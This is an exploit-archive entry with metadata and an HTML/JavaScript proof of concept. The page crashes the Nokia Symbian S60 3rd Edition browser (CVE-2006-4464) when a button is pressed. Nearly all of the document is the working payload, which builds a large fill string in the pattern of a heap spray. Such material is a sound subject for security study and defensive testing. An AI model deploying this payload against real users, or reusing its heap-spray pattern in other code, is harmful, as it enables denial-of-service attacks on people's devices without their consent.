Nokia Symbian 60 3rd Edition - Browser Crash (Denial of Service)
Author: Qode
type: dos
platform: hardware
port:
date_added: 2006-08-12
date_updated:
verified: 1
codes: OSVDB-29195;CVE-2006-4464
tags:
aliases:
screenshot_url:
application_url:
<!--
Nokia Browser Crash by Qode
http://www.qode.org
-->
<html><body><script>
function crash()
{
alert('Nokia Browser Crash by Qode');
shellcode = unescape('%ucccc');
fill = unescape('%ucccc');
addr = 0x02020202;
var b = fill;
while (b.length <= 0x400000) b+=b;
}
</script>
Nokia Browser Crash by Qode<br>
<input type='button' onClick='crash()' value='Crash'>
</body></html>
# milw0rm.com [2006-08-13]